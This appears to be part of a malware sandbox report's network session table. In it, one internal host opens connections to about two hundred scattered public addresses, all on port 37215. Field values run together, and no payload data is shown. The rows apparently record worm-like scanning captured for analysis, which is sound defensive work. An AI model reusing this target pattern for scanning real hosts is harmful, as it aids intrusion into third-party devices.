                                                                            28402192.168.2.153453041.116.3.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28403192.168.2.154827041.139.149.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28404192.168.2.154113841.201.194.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28405192.168.2.154950041.118.50.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28406192.168.2.153296241.13.188.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28407192.168.2.155069041.182.23.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28408192.168.2.153905241.84.50.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28409192.168.2.155754841.231.255.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28410192.168.2.155601041.4.226.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28411192.168.2.153859641.43.240.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28412192.168.2.154463641.119.64.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28413192.168.2.155227041.40.102.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28414192.168.2.155520041.56.240.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28415192.168.2.153437441.18.10.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28416192.168.2.154588241.74.251.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28417192.168.2.154841441.45.133.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28418192.168.2.155853441.165.6.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28419192.168.2.154408041.248.21.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28420192.168.2.153949241.71.123.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28421192.168.2.154260041.128.57.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28422192.168.2.154322641.95.35.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28423192.168.2.153839841.139.209.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28424192.168.2.155047641.77.149.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28425192.168.2.153950641.20.91.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28426192.168.2.155545241.235.145.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28427192.168.2.153419841.14.206.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28428192.168.2.154520041.238.69.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28429192.168.2.155923241.223.126.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28430192.168.2.153479041.101.95.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28431192.168.2.155931441.90.165.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28432192.168.2.153637841.250.89.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28433192.168.2.156030841.117.123.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28434192.168.2.153835041.78.249.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28435192.168.2.155586441.109.22.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28436192.168.2.154419041.251.128.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28437192.168.2.154609041.60.138.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28438192.168.2.155863641.18.196.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28439192.168.2.153793841.128.215.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28440192.168.2.155489841.104.170.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28441192.168.2.153413841.87.202.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28442192.168.2.153322241.16.1.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28443192.168.2.155496041.117.213.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28444192.168.2.154792841.40.248.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28445192.168.2.153534841.145.46.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28446192.168.2.154478241.60.133.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28447192.168.2.153660841.231.19.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28448192.168.2.154307641.235.96.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28449192.168.2.154554641.184.237.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28450192.168.2.155002441.37.58.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28451192.168.2.154735841.202.232.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28452192.168.2.156043641.41.69.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28453192.168.2.155059641.39.172.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28454192.168.2.156067841.117.128.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28455192.168.2.154449641.168.109.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28456192.168.2.154054641.190.248.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28457192.168.2.155817841.127.221.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28458192.168.2.154202641.189.67.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28459192.168.2.155496641.193.133.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28460192.168.2.153361241.219.22.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28461192.168.2.154871241.20.68.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28462192.168.2.154593841.233.181.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28463192.168.2.154718441.117.195.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28464192.168.2.153612241.48.251.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28465192.168.2.154918041.27.214.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28466192.168.2.155803841.220.9.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28467192.168.2.154774441.134.0.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28468192.168.2.153488441.214.218.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28469192.168.2.154280241.238.94.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28470192.168.2.155008441.148.200.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28471192.168.2.153984241.92.87.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28472192.168.2.154214841.43.194.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28473192.168.2.155943041.186.161.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28474192.168.2.154128641.189.187.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28475192.168.2.155722441.135.229.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28476192.168.2.154634841.186.62.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28477192.168.2.153580041.171.110.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28478192.168.2.154509241.225.70.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28479192.168.2.155679441.76.111.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28480192.168.2.155933041.105.14.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28481192.168.2.153414041.52.52.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28482192.168.2.154153241.224.121.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28483192.168.2.155729641.174.96.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28484192.168.2.153973641.49.228.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28485192.168.2.154907241.69.29.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28486192.168.2.154550241.157.69.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28487192.168.2.153381441.199.162.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28488192.168.2.154770641.62.146.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28489192.168.2.155258241.8.222.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28490192.168.2.154894241.166.36.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28491192.168.2.154978841.152.18.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28492192.168.2.156082841.168.92.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28493192.168.2.153352241.128.105.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28494192.168.2.153515641.107.177.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28495192.168.2.153699841.212.177.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28496192.168.2.155844641.222.137.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28497192.168.2.153319641.223.54.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28498192.168.2.155782041.47.209.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28499192.168.2.154448041.191.127.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28500192.168.2.153358641.153.19.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28501192.168.2.154436841.238.6.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28502192.168.2.155768241.94.73.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28503192.168.2.155357241.93.160.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28504192.168.2.154271641.43.67.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28505192.168.2.155526241.213.119.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28506192.168.2.154085641.226.234.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28507192.168.2.153878841.89.31.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28508192.168.2.154969841.142.250.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28509192.168.2.1544472197.142.112.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28510192.168.2.1552052197.169.86.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28511192.168.2.1552978197.13.65.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28512192.168.2.1549978197.102.239.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28513192.168.2.1542838197.123.146.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28514192.168.2.1537046197.151.151.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28515192.168.2.1545238197.111.103.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28516192.168.2.1537792197.104.78.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28517192.168.2.1552956197.175.120.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28518192.168.2.1532872197.41.199.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28519192.168.2.1559548197.223.85.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28520192.168.2.1559768197.210.27.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28521192.168.2.1560578197.167.33.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28522192.168.2.1558012197.28.203.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28523192.168.2.1558034197.164.151.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28524192.168.2.1543468197.202.1.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28525192.168.2.1533726197.215.136.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28526192.168.2.1534332197.151.47.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28527192.168.2.1540740197.160.251.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28528192.168.2.1548926197.33.215.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28529192.168.2.1548228197.71.17.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28530192.168.2.1557778197.106.204.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28531192.168.2.1555544197.107.130.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28532192.168.2.1537024197.117.58.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28533192.168.2.1537564197.59.48.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28534192.168.2.1540072197.181.255.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28535192.168.2.1535458197.81.113.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28536192.168.2.1557284197.170.228.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28537192.168.2.1560272197.63.156.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28538192.168.2.1555072197.229.198.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28539192.168.2.1549536197.180.155.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28540192.168.2.1544598197.165.184.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28541192.168.2.1536748197.62.64.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28542192.168.2.1553024197.91.61.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28543192.168.2.1553836197.150.147.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28544192.168.2.1544022197.122.106.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28545192.168.2.1533558197.129.69.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28546192.168.2.1549036197.214.162.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28547192.168.2.1552666197.219.161.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28548192.168.2.1535952197.209.75.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28549192.168.2.1554714197.194.160.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28550192.168.2.1553868197.10.78.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28551192.168.2.1542000197.126.126.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28552192.168.2.1535232197.82.199.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28553192.168.2.1536718197.156.183.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28554192.168.2.1543668197.143.160.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28555192.168.2.1542842197.62.232.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28556192.168.2.1559474197.59.237.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28557192.168.2.1554570197.34.45.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28558192.168.2.1557558197.101.54.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28559192.168.2.1538130197.135.161.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28560192.168.2.1537806197.190.124.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28561192.168.2.1538046197.114.229.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28562192.168.2.1549768197.49.215.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28563192.168.2.1560668197.230.193.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28564192.168.2.1544312197.12.207.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28565192.168.2.1537824197.179.131.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28566192.168.2.1549400197.64.126.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28567192.168.2.1536146197.163.204.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28568192.168.2.1546486197.14.67.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28569192.168.2.1537366197.121.237.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28570192.168.2.1547934197.58.145.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28571192.168.2.1542928197.91.120.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28572192.168.2.1544836197.54.95.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28573192.168.2.1559496197.199.244.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28574192.168.2.1538290197.17.171.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28575192.168.2.1546112197.176.53.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28576192.168.2.1539194197.18.127.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28577192.168.2.1549196197.167.238.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28578192.168.2.1540822197.11.105.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28579192.168.2.1556980197.43.235.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28580192.168.2.1555040197.11.7.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28581192.168.2.1536512197.168.39.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28582192.168.2.1542696197.235.24.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28583192.168.2.1558630197.26.83.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28584192.168.2.1541110197.68.94.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28585192.168.2.1544398197.195.209.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28586192.168.2.1537634197.73.87.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28587192.168.2.1553420197.221.238.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28588192.168.2.1559206197.123.193.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28589192.168.2.1552782197.46.194.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28590192.168.2.1555282197.155.133.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28591192.168.2.1560108197.198.216.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28592192.168.2.1543318197.150.239.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28593192.168.2.1546294197.24.69.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28594192.168.2.1557532197.180.222.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28595192.168.2.1554266197.139.47.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28596192.168.2.1558634197.37.182.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28597192.168.2.1536212197.0.145.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28598192.168.2.1552268197.190.175.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28599192.168.2.1555286197.50.115.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28600192.168.2.1545812197.60.173.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28601192.168.2.1554978197.23.160.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28602192.168.2.1554154197.130.142.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28603192.168.2.1552552197.159.188.1037215
